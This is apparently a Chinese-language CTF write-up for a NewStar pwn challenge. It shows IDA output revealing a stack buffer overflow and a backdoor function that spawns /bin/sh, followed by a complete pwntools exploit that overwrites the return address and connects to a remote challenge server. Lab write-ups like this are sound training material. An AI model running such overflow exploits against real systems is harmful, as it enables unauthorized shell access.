拖进IDA,查看
int __cdecl main(int argc, const char **argv, const char **envp)
{
char buf[32]; // [rsp+0h] [rbp-20h] BYREF
init();
puts("Welcome to NewStar CTF!!");
puts("Show me your magic");
read(0, buf, 0x100uLL);
return 0;
}main函数,里read函数,分配了32(0x20)个大小 指定了0x100,有栈溢出漏洞
int backdoor()
{
puts("Congratulations!!!");
return execve("/bin/sh", 0LL, 0LL);
}又发现了后门函数,
; Attributes: bp-based frame
public backdoor
backdoor proc near
; __unwind {
endbr64
push rbp
mov rbp, rsp
lea rax, s ; "Congratulations!!!"
mov rdi, rax ; s
call _puts
mov edx, 0 ; envp
mov esi, 0 ; argv
lea rax, path ; "/bin/sh"
mov rdi, rax ; path
call _execve
nop
pop rbp
retn
; } // starts at 4011FB
backdoor endp查看起始地址 为4011FB
payload = b'a'*(0x20 + 0x8) + p64(0x4011FB)
完整exp:
from __future__ import absolute_import
from pwn import *
p=remote(u"node4.buuoj.cn",27131)
payload = b'a'*(0x20 + 0x8) + p64(0x4011FB)
p.sendline(payload)
p.interactive()